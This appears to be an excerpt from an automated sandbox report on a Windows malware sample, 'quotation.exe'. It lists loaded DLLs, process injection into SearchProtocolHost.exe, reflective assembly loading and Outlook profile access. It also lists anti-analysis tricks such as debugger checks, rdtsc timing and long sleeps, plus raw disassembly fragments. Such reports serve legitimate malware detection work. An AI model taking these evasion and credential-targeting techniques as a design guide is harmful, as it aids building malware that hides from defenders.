                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: cryptbase.dll
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeSection loaded: wininet.dll
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeSection loaded: mswsock.dll
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeSection loaded: dnsapi.dll
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeSection loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeSection loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\quotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\quotation.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: quotation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: quotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gkTgnrvdOG.exe, 00000005.00000002.4519132239.0000000000B5E000.00000002.00000001.01000000.0000000C.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520216531.0000000000B5E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: quotation.exe, 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000003.2381531923.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000003.2384137153.0000000003024000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: quotation.exe, quotation.exe, 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, SearchProtocolHost.exe, 00000006.00000003.2381531923.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000003.2384137153.0000000003024000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: SearchProtocolHost.pdbUGP source: gkTgnrvdOG.exe, 00000005.00000003.2320609449.000000000152B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: SearchProtocolHost.pdb source: gkTgnrvdOG.exe, 00000005.00000003.2320609449.000000000152B000.00000004.00000001.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.quotation.exe.7b50000.4.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, vaqtyES1x9bnG2cr2n.cs.Net Code: GoPHorQdXd System.Reflection.Assembly.Load(byte[])
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, vaqtyES1x9bnG2cr2n.cs.Net Code: GoPHorQdXd System.Reflection.Assembly.Load(byte[])
                Source: 0.2.quotation.exe.4551d80.1.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, vaqtyES1x9bnG2cr2n.cs.Net Code: GoPHorQdXd System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\quotation.exeCode function: 0_2_02BC0B69 push ebx; iretd 0_2_02BC0B7B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_00414B10 push edx; retf A241h3_2_00414B38
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_00405057 push es; retf 3_2_00405075
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_00416074 push eax; retf 3_2_0041609C
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_00412176 push edx; iretd 3_2_00412179
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0040AC7B push es; retf 3_2_0040AC88
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_00403400 push eax; ret 3_2_00403402
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_00411CE9 push esp; retf 3_2_00411C7E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_00415FBD pushad ; retf 3_2_00415FBE
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B09AD push ecx; mov dword ptr [esp], ecx3_2_012B09B6
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0128135E push eax; iretd 3_2_01281369
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032009AD push ecx; mov dword ptr [esp], ecx6_2_032009B6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A1E52B push ebp; retf 6_2_02A1E533
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A1E8E6 push esp; retf 6_2_02A1E87B
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A1ED73 push edx; iretd 6_2_02A1ED76
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A2564E push eax; retf 6_2_02A2564F
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A17878 push es; retf 6_2_02A17885
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A2B9E3 push es; retf 6_2_02A2B9E4
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A11C54 push es; retf 6_2_02A11C72
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A2BD02 push cs; iretd 6_2_02A2BD05
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A2BD45 push FFFFFFB7h; retf 6_2_02A2BD52
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0352634D push ebx; ret 6_2_0352634E
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_035351E2 push eax; ret 6_2_035351E4
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0352A42B push BF809140h; iretd 6_2_0352A430
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_035249A1 push ecx; ret 6_2_035249B2
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03525F21 push 0D885E92h; iretd 6_2_03525F33
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03525E9A push ebx; retf 6_2_03525EAB
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03524C5B push esp; iretd 6_2_03524C61
                Source: quotation.exeStatic PE information: section name: .text entropy: 7.780021412382436
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, 0.2.quotation.exe.47b2210.2.raw.unpack, 0.2.quotation.exe.483d230.0.raw.unpack: High entropy of concatenated method names
                Source: C:\Users\user\Desktop\quotation.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: quotation.exe PID: 2364, type: MEMORYSTR
                Source: C:\Users\user\Desktop\quotation.exe Code function: 3_2_012F096E rdtsc 3_2_012F096E
                Source: C:\Users\user\Desktop\quotation.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Window / User API: threadDelayed 2823
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Window / User API: threadDelayed 7148
                Source: C:\Users\user\Desktop\quotation.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe API coverage: 2.7 %
                Source: C:\Users\user\Desktop\quotation.exe TID: 3184 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 6548 Thread sleep count: 2823 > 30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 6548 Thread sleep time: -5646000s >= -30000s
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 6548 Thread sleep count: 7148 > 30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 6548 Thread sleep time: -14296000s >= -30000s
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe TID: 3136 Thread sleep time: -65000s >= -30000s
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe TID: 3136 Thread sleep count: 36 > 30
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe TID: 3136 Thread sleep time: -54000s >= -30000s
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe TID: 3136 Thread sleep count: 36 > 30
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe TID: 3136 Thread sleep time: -36000s >= -30000s
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Code function: 6_2_02A2C860 FindFirstFileW,FindNextFileW,FindClose,6_2_02A2C860
                Source: C:\Users\user\Desktop\quotation.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\quotation.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\quotation.exe Code function: 3_2_00417C23 LdrLoadDll,3_2_00417C23
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012CE3F0 mov eax, dword ptr fs:[00000030h]3_2_012CE3F0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013543D4 mov eax, dword ptr fs:[00000030h]3_2_013543D4
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013543D4 mov eax, dword ptr fs:[00000030h]3_2_013543D4
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA3C0 mov eax, dword ptr fs:[00000030h]3_2_012BA3C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA3C0 mov eax, dword ptr fs:[00000030h]3_2_012BA3C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA3C0 mov eax, dword ptr fs:[00000030h]3_2_012BA3C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA3C0 mov eax, dword ptr fs:[00000030h]3_2_012BA3C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA3C0 mov eax, dword ptr fs:[00000030h]3_2_012BA3C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA3C0 mov eax, dword ptr fs:[00000030h]3_2_012BA3C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B83C0 mov eax, dword ptr fs:[00000030h]3_2_012B83C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B83C0 mov eax, dword ptr fs:[00000030h]3_2_012B83C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B83C0 mov eax, dword ptr fs:[00000030h]3_2_012B83C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B83C0 mov eax, dword ptr fs:[00000030h]3_2_012B83C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135E3DB mov eax, dword ptr fs:[00000030h]3_2_0135E3DB
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135E3DB mov eax, dword ptr fs:[00000030h]3_2_0135E3DB
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135E3DB mov ecx, dword ptr fs:[00000030h]3_2_0135E3DB
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135E3DB mov eax, dword ptr fs:[00000030h]3_2_0135E3DB
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013363C0 mov eax, dword ptr fs:[00000030h]3_2_013363C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0136C3CD mov eax, dword ptr fs:[00000030h]3_2_0136C3CD
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012A823B mov eax, dword ptr fs:[00000030h]3_2_012A823B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012A826B mov eax, dword ptr fs:[00000030h]3_2_012A826B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360274 mov eax, dword ptr fs:[00000030h]3_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360274 mov eax, dword ptr fs:[00000030h]3_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360274 mov eax, dword ptr fs:[00000030h]3_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360274 mov eax, dword ptr fs:[00000030h]3_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360274 mov eax, dword ptr fs:[00000030h]3_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360274 mov eax, dword ptr fs:[00000030h]3_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360274 mov eax, dword ptr fs:[00000030h]3_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360274 mov eax, dword ptr fs:[00000030h]3_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360274 mov eax, dword ptr fs:[00000030h]3_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360274 mov eax, dword ptr fs:[00000030h]3_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360274 mov eax, dword ptr fs:[00000030h]3_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360274 mov eax, dword ptr fs:[00000030h]3_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B4260 mov eax, dword ptr fs:[00000030h]3_2_012B4260
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B4260 mov eax, dword ptr fs:[00000030h]3_2_012B4260
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B4260 mov eax, dword ptr fs:[00000030h]3_2_012B4260
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0138625D mov eax, dword ptr fs:[00000030h]3_2_0138625D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0136A250 mov eax, dword ptr fs:[00000030h]3_2_0136A250
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0136A250 mov eax, dword ptr fs:[00000030h]3_2_0136A250
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01338243 mov eax, dword ptr fs:[00000030h]3_2_01338243
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01338243 mov ecx, dword ptr fs:[00000030h]3_2_01338243
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B6259 mov eax, dword ptr fs:[00000030h]3_2_012B6259
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012AA250 mov eax, dword ptr fs:[00000030h]3_2_012AA250
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C02A0 mov eax, dword ptr fs:[00000030h]3_2_012C02A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C02A0 mov eax, dword ptr fs:[00000030h]3_2_012C02A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013462A0 mov eax, dword ptr fs:[00000030h]3_2_013462A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013462A0 mov ecx, dword ptr fs:[00000030h]3_2_013462A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013462A0 mov eax, dword ptr fs:[00000030h]3_2_013462A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013462A0 mov eax, dword ptr fs:[00000030h]3_2_013462A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013462A0 mov eax, dword ptr fs:[00000030h]3_2_013462A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013462A0 mov eax, dword ptr fs:[00000030h]3_2_013462A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE284 mov eax, dword ptr fs:[00000030h]3_2_012EE284
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE284 mov eax, dword ptr fs:[00000030h]3_2_012EE284
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01330283 mov eax, dword ptr fs:[00000030h]3_2_01330283
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01330283 mov eax, dword ptr fs:[00000030h]3_2_01330283
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01330283 mov eax, dword ptr fs:[00000030h]3_2_01330283
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C02E1 mov eax, dword ptr fs:[00000030h]3_2_012C02E1
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C02E1 mov eax, dword ptr fs:[00000030h]3_2_012C02E1
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C02E1 mov eax, dword ptr fs:[00000030h]3_2_012C02E1
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA2C3 mov eax, dword ptr fs:[00000030h]3_2_012BA2C3
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA2C3 mov eax, dword ptr fs:[00000030h]3_2_012BA2C3
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA2C3 mov eax, dword ptr fs:[00000030h]3_2_012BA2C3
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA2C3 mov eax, dword ptr fs:[00000030h]3_2_012BA2C3
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA2C3 mov eax, dword ptr fs:[00000030h]3_2_012BA2C3
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013862D6 mov eax, dword ptr fs:[00000030h]3_2_013862D6
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE53E mov eax, dword ptr fs:[00000030h]3_2_012DE53E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE53E mov eax, dword ptr fs:[00000030h]3_2_012DE53E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE53E mov eax, dword ptr fs:[00000030h]3_2_012DE53E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE53E mov eax, dword ptr fs:[00000030h]3_2_012DE53E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE53E mov eax, dword ptr fs:[00000030h]3_2_012DE53E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0535 mov eax, dword ptr fs:[00000030h]3_2_012C0535
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0535 mov eax, dword ptr fs:[00000030h]3_2_012C0535
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0535 mov eax, dword ptr fs:[00000030h]3_2_012C0535
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0535 mov eax, dword ptr fs:[00000030h]3_2_012C0535
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0535 mov eax, dword ptr fs:[00000030h]3_2_012C0535
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0535 mov eax, dword ptr fs:[00000030h]3_2_012C0535
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01346500 mov eax, dword ptr fs:[00000030h]3_2_01346500
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01384500 mov eax, dword ptr fs:[00000030h]3_2_01384500
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01384500 mov eax, dword ptr fs:[00000030h]3_2_01384500
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01384500 mov eax, dword ptr fs:[00000030h]3_2_01384500
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01384500 mov eax, dword ptr fs:[00000030h]3_2_01384500
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01384500 mov eax, dword ptr fs:[00000030h]3_2_01384500
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01384500 mov eax, dword ptr fs:[00000030h]3_2_01384500
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01384500 mov eax, dword ptr fs:[00000030h]3_2_01384500
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E656A mov eax, dword ptr fs:[00000030h]3_2_012E656A
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E656A mov eax, dword ptr fs:[00000030h]3_2_012E656A
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E656A mov eax, dword ptr fs:[00000030h]3_2_012E656A
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B8550 mov eax, dword ptr fs:[00000030h]3_2_012B8550
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B8550 mov eax, dword ptr fs:[00000030h]3_2_012B8550
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013305A7 mov eax, dword ptr fs:[00000030h]3_2_013305A7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013305A7 mov eax, dword ptr fs:[00000030h]3_2_013305A7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013305A7 mov eax, dword ptr fs:[00000030h]3_2_013305A7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D45B1 mov eax, dword ptr fs:[00000030h]3_2_012D45B1
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D45B1 mov eax, dword ptr fs:[00000030h]3_2_012D45B1
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E4588 mov eax, dword ptr fs:[00000030h]3_2_012E4588
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B2582 mov eax, dword ptr fs:[00000030h]3_2_012B2582
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B2582 mov ecx, dword ptr fs:[00000030h]3_2_012B2582
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE59C mov eax, dword ptr fs:[00000030h]3_2_012EE59C
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EC5ED mov eax, dword ptr fs:[00000030h]3_2_012EC5ED
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EC5ED mov eax, dword ptr fs:[00000030h]3_2_012EC5ED
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE5E7 mov eax, dword ptr fs:[00000030h]3_2_012DE5E7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE5E7 mov eax, dword ptr fs:[00000030h]3_2_012DE5E7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE5E7 mov eax, dword ptr fs:[00000030h]3_2_012DE5E7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE5E7 mov eax, dword ptr fs:[00000030h]3_2_012DE5E7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE5E7 mov eax, dword ptr fs:[00000030h]3_2_012DE5E7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE5E7 mov eax, dword ptr fs:[00000030h]3_2_012DE5E7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE5E7 mov eax, dword ptr fs:[00000030h]3_2_012DE5E7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE5E7 mov eax, dword ptr fs:[00000030h]3_2_012DE5E7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B25E0 mov eax, dword ptr fs:[00000030h]3_2_012B25E0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE5CF mov eax, dword ptr fs:[00000030h]3_2_012EE5CF
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE5CF mov eax, dword ptr fs:[00000030h]3_2_012EE5CF
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B65D0 mov eax, dword ptr fs:[00000030h]3_2_012B65D0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EA5D0 mov eax, dword ptr fs:[00000030h]3_2_012EA5D0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EA5D0 mov eax, dword ptr fs:[00000030h]3_2_012EA5D0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012AE420 mov eax, dword ptr fs:[00000030h]3_2_012AE420
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012AE420 mov eax, dword ptr fs:[00000030h]3_2_012AE420
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012AE420 mov eax, dword ptr fs:[00000030h]3_2_012AE420
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012AC427 mov eax, dword ptr fs:[00000030h]3_2_012AC427
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01336420 mov eax, dword ptr fs:[00000030h]3_2_01336420
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01336420 mov eax, dword ptr fs:[00000030h]3_2_01336420
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01336420 mov eax, dword ptr fs:[00000030h]3_2_01336420
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01336420 mov eax, dword ptr fs:[00000030h]3_2_01336420
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01336420 mov eax, dword ptr fs:[00000030h]3_2_01336420
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01336420 mov eax, dword ptr fs:[00000030h]3_2_01336420
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01336420 mov eax, dword ptr fs:[00000030h]3_2_01336420
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EA430 mov eax, dword ptr fs:[00000030h]3_2_012EA430
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E8402 mov eax, dword ptr fs:[00000030h]3_2_012E8402
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E8402 mov eax, dword ptr fs:[00000030h]3_2_012E8402
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E8402 mov eax, dword ptr fs:[00000030h]3_2_012E8402
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133C460 mov ecx, dword ptr fs:[00000030h]3_2_0133C460
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DA470 mov eax, dword ptr fs:[00000030h]3_2_012DA470
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DA470 mov eax, dword ptr fs:[00000030h]3_2_012DA470
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DA470 mov eax, dword ptr fs:[00000030h]3_2_012DA470
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0136A456 mov eax, dword ptr fs:[00000030h]3_2_0136A456
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE443 mov eax, dword ptr fs:[00000030h]3_2_012EE443
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE443 mov eax, dword ptr fs:[00000030h]3_2_012EE443
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE443 mov eax, dword ptr fs:[00000030h]3_2_012EE443
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE443 mov eax, dword ptr fs:[00000030h]3_2_012EE443
